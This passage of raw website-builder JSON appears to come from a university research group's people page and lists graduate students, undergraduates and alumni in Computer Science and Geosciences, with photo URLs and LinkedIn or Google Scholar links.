Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/sundos-al-subhi-88bb97150\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c63\",\"index\":1,\"id\":\"182-c68\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c69\",\"parentId\":\"182-c62\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c69\",\"index\":0,\"id\":\"182-c70\",\"partialId\":182,\"styleRef\":849,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/06\\/cropped-IMG_1240-scaled-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1336,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c69\",\"index\":0,\"id\":\"182-c71\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Aaja Christie<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c69\",\"index\":2,\"id\":\"182-c72\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Candidate<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c69\",\"index\":3,\"id\":\"182-c73\",\"partialId\":182,\"styleRef\":901,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/aaja-christie-17573657\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c69\",\"index\":1,\"id\":\"182-c74\",\"partialId\":182,\"styleRef\":853,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c75\",\"parentId\":\"182-c62\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c75\",\"index\":0,\"id\":\"182-c76\",\"partialId\":182,\"styleRef\":856,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-Emma.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":966,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c75\",\"index\":0,\"id\":\"182-c77\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Emma McDaniel<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c75\",\"index\":2,\"id\":\"182-c78\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Candidate<br><\\/p>\"}},{\"name\":\"hop-text\",\"styleRef\":852,\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"parentId\":\"182-c75\",\"index\":1,\"id\":\"182-c79\",\"partialId\":182,\"type\":\"content\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/emmamcdaniel\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=Cwt8OwkAAAAJ&hl=en\"},\"name\":\"socicon\\/googlescholar\"}]},\"parentId\":\"182-c75\",\"index\":1,\"id\":\"182-c80\",\"partialId\":182,\"styleRef\":857,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c81\",\"parentId\":\"182-c62\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c81\",\"index\":0,\"id\":\"182-c82\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/anupam.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1624,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c81\",\"index\":0,\"id\":\"182-c83\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Anupam Sarker<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c81\",\"index\":2,\"id\":\"182-c84\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c81\",\"index\":3,\"id\":\"182-c85\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/anupam-sarker-b164b412a\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c81\",\"index\":1,\"id\":\"182-c86\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c87\",\"parentId\":\"182-c62\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c87\",\"index\":0,\"id\":\"182-c88\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Ardavan.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":863,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c87\",\"index\":0,\"id\":\"182-c89\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Ardavan Sassini\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c87\",\"index\":2,\"id\":\"182-c90\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c87\",\"index\":3,\"id\":\"182-c91\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/ardavansassani\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c87\",\"index\":1,\"id\":\"182-c92\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c93\",\"parentId\":\"182-c62\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c93\",\"index\":0,\"id\":\"182-c94\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Basit-2.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":838,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c93\",\"index\":0,\"id\":\"182-c95\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Basit Damilare Amuda\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c93\",\"index\":2,\"id\":\"182-c96\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c93\",\"index\":3,\"id\":\"182-c97\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"http:\\/\\/linkedin.com\\/in\\/basit-amuda-227098238\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c93\",\"index\":1,\"id\":\"182-c98\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c99\",\"parentId\":\"182-c62\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c99\",\"index\":0,\"id\":\"182-c100\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/sara-edwards1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1399,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c99\",\"index\":0,\"id\":\"182-c101\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Sara Edwards<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c99\",\"index\":2,\"id\":\"182-c102\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c99\",\"index\":3,\"id\":\"182-c103\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/sara-edwards-691b8331\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c99\",\"index\":1,\"id\":\"182-c104\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c105\",\"parentId\":\"182-c62\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c105\",\"index\":0,\"id\":\"182-c106\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-cropped-Ryan-e1649958770354.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1050,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c105\",\"index\":0,\"id\":\"182-c107\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Ryan Garland<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c105\",\"index\":2,\"id\":\"182-c108\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c105\",\"index\":3,\"id\":\"182-c109\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/ryan-g-aa71a0163\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c105\",\"index\":1,\"id\":\"182-c110\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"182-c83\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c111\",\"parentId\":\"182-c62\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c111\",\"index\":0,\"id\":\"182-c112\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-Jean.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1094,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c111\",\"index\":0,\"id\":\"182-c113\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Jean Guo\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c111\",\"index\":2,\"id\":\"182-c114\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s student<\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c111\",\"index\":3,\"id\":\"182-c115\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c116\",\"parentId\":\"182-c62\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c116\",\"index\":0,\"id\":\"182-c117\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Angelique.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":874,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c116\",\"index\":0,\"id\":\"182-c118\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Angelique Willis\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c116\",\"index\":2,\"id\":\"182-c119\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Master\'s student<\\/span><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c116\",\"index\":3,\"id\":\"182-c120\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/angelique-willis\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c116\",\"index\":1,\"id\":\"182-c121\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"182-c83\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c122\",\"parentId\":\"182-c62\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c122\",\"index\":0,\"id\":\"182-c123\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/11\\/bayo-e1695781168350.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1369,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c122\",\"index\":0,\"id\":\"182-c124\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Sikiru Bayo Abdulkareem\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c122\",\"index\":2,\"id\":\"182-c125\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Master\'s student<\\/span><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c122\",\"index\":3,\"id\":\"182-c126\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"www.linkedin.com\\/in\\/bayonle\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c122\",\"index\":1,\"id\":\"182-c127\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"182-c83\"}],\"styleRef\":848,\"type\":\"content\"}],\"id\":\"182-c62\",\"parentId\":\"182-c61\",\"partialId\":182,\"styleRef\":847,\"type\":\"content\"}],\"id\":\"182-c61\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Graduates\"},\"id\":\"182-c130\",\"parentId\":\"182-c129\",\"partialId\":182,\"styleRef\":862,\"type\":\"content\"}],\"id\":\"182-c129\",\"parentId\":\"182-c128\",\"partialId\":182,\"styleRef\":861,\"type\":\"content\"}],\"id\":\"182-c128\",\"parentId\":\"182-c61\",\"partialId\":182,\"styleRef\":860,\"type\":\"content\"}]},\"styleRef\":846,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Undergrads\",\"attrs\":{\"id\":\"undergrads-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c133\",\"parentId\":\"182-c132\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c133\",\"index\":0,\"id\":\"182-c134\",\"partialId\":182,\"styleRef\":831,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1417,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c133\",\"index\":0,\"id\":\"182-c135\",\"partialId\":182,\"styleRef\":832,\"type\":\"content\",\"props\":{\"content\":\"Joshua Quiroz<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c133\",\"index\":2,\"id\":\"182-c136\",\"partialId\":182,\"styleRef\":833,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/joshua-quiroz-315713215\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c133\",\"index\":1,\"id\":\"182-c137\",\"partialId\":182,\"styleRef\":835,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":830,\"type\":\"content\"}],\"id\":\"182-c132\",\"parentId\":\"182-c131\",\"partialId\":182,\"styleRef\":829,\"type\":\"content\"}],\"id\":\"182-c131\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Undergraduates\"},\"id\":\"182-c140\",\"parentId\":\"182-c139\",\"partialId\":182,\"styleRef\":844,\"type\":\"content\"}],\"id\":\"182-c139\",\"parentId\":\"182-c138\",\"partialId\":182,\"styleRef\":843,\"type\":\"content\"}],\"id\":\"182-c138\",\"parentId\":\"182-c131\",\"partialId\":182,\"styleRef\":842,\"type\":\"content\"}]},\"styleRef\":828,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Alumni\",\"attrs\":{\"id\":\"alumni\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c143\",\"parentId\":\"182-c142\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c143\",\"index\":0,\"id\":\"182-c144\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Sarah_Akinola-scaled-2.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1595,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c143\",\"index\":0,\"id\":\"182-c145\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Sarah Akinola\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c143\",\"index\":2,\"id\":\"182-c146\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/akinola-sarah-035789138\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c143\",\"index\":1,\"id\":\"182-c147\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c148\",\"parentId\":\"182-c142\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c148\",\"index\":0,\"id\":\"182-c149\",\"partialId\":182,\"styleRef\":918,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Anvith.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1597,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c148\",\"index\":0,\"id\":\"182-c150\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Anvith Anand\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c148\",\"index\":2,\"id\":\"182-c151\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/anvith-anand\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c148\",\"index\":1,\"id\":\"182-c152\",\"partialId\":182,\"styleRef\":919,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c153\",\"parentId\":\"182-c142\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c153\",\"index\":0,\"id\":\"182-c154\",\"partialId\":182,\"styleRef\":920,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Alex.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":884,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c153\",\"index\":0,\"id\":\"182-c155\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Alex Asige\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c153\",\"index\":2,\"id\":\"182-c156\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/twitter\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/twitter.com\\/i\\/flow\\/login?redirect_after_login=%2FAsigeAlex\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882}]},\"parentId\":\"182-c153\",\"index\":1,\"id\":\"182-c157\",\"partialId\":182,\"styleRef\":921,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c158\",\"parentId\":\"182-c142\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c158\",\"index\":0,\"id\":\"182-c159\",\"partialId\":182,\"styleRef\":922,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Bhavya-scaled-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":776,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c158\",\"index\":0,\"id\":\"182-c160\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Bhavya Busireddy\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c158\",\"index\":2,\"id\":\"182-c161\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Computer Science<\\/span><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/bhavya-busireddy-b052b192\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c158\",\"index\":1,\"id\":\"182-c162\",\"partialId\":182,\"styleRef\":923,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c163\",\"parentId\":\"182-c142\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c163\",\"index\":0,\"id\":\"182-c164\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Vineeth.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":831,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c163\",\"index\":0,\"id\":\"182-c165\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Vineeth Kumar Chandha\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c163\",\"index\":2,\"id\":\"182-c166\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/vineeth-kumar-chandha-207611149\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c163\",\"index\":1,\"id\":\"182-c167\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c168\",\"parentId\":\"182-c142\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c168\",\"index\":0,\"id\":\"182-c169\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-sathwik-2-scaled-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1007,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c168\",\"index\":0,\"id\":\"182-c170\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Sathwik Chowda\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c168\",\"index\":2,\"id\":\"182-c171\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Computer 